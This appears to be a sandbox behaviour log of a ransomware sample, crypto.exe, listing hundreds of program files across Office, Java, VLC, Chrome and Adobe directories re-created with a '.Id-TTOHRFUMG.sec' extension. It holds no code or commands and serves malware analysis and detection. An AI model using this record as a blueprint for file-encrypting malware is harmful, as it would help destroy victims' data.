File created	C:\Program Files\Microsoft Office\Office14\PUBBA\MSPUB10.BDR.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_ru.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pitcairn.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\kinit.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-core-kit.xml_hidden.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\fxplugins.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00208_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\NotifierCloseButton.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_pt-PT.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_highlights_Thumbnail.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Media Player\wmprph.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099175.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\SIDEBARBB.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\lv.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_top_left.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-impl.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_bottom_left.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\STS2\tab_on.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-io_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\imap.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00242_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01680_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03451_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY01590_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21504_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\main.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Media Player\en-US\WMPMediaSharing.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiling.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PSSKETSM.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00910_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.json.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libstl_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\tzmappings.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\dial.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00014_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02233_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL016.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\playlist\vocaroo.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Media Player\en-US\WMPDMCCore.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19695_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01761_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099164.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152414.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00234_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ONMAIN.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Stationery\1033\TECHTOOL.HTM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_wasapi_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.command_0.10.0.v201209301215.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\SIGNL.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\NotifierBackgroundRTL.jpg.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\APIFile_8.ico	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099193.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-6.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-startup.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107658.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0215070.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CSS7DATA000A.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\wmplayer.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\bin\ij.bat.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\Distinctive.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\sbdrop.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Vancouver.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00956_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0211981.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL01394_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN01165_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationUp_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_hyperlink.gif.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_few-showers.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Cape_Verde.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\QP.DPV.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Ushuaia.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\AUDIOSEARCHSAPIFE.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00681_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\EADOCUMENTAPPROVAL_REVIEW.XSN.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME44.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\libGLESv2.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\id.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Apothecary.xml.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\delete_up.png.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\ahclient.dll	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Asuncion.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0157191.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00255_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Oriel.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR46F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14997_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21318_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\WEBPAGE.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-search.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199279.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01304G.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\settings.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\larrow.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.ja_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Madeira.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_sk.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\RSPMECH.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-outline.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Yakutat.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Australia\Brisbane.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182902.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382948.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MSPUB.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\css\settings.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerEvaluators.exsd.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-core.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.CN.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\sqlceme35.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_bottom.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libtrivial_channel_mixer_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01242_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00343_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145810.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\computericon.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\INLAUNCH.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\PROGRAM.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-ui.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Andorra.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-explorer.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\unpack.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10297_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Bibliography\Style\GostTitle.XSL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Godthab.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libyuy2_i420_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\Media Renderer\DMR_120.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bPrev-down.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\InactiveTabImage.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0230876.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PROOF\MSSP7ES.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\20.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Pago_Pago.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\js\common.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libdmo_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\36.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\GMT+3.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21340_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\keystore\libmemory_keystore_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-io.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.conf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386120.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00444_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14578_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MSPUB.TLB.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\19.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\com.jrockit.mc.console.ui.notification_contexts.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CG1606.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152590.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21302_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME07.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\icon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\glow.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_h.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Africa\Casablanca.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Bangkok.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01329_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\ONENOTE.HXS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME32.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\Skins\Revert.wmz.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\eclipse_1665.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\ONENOTE\14\Notebook Templates\Notebook03.onepkg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\Network Sharing\ConnectionManager.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rightnav.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Copenhagen.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL102.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ogalegit.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libnoseek_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libxa_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-new_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Puerto_Rico.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationLeft_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ONBttnPPT.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\A3DUtility.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152696.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0090779.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarToolIconImagesMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-heap-l1-1-0.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\chrome.dll.sig.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\msolap100.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\SystemV\CST6CDT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00428_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE05710_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14866_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR46B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR29F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\toc.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01178_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0215076.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0251301.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\license.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-bootstrap.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ADD.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
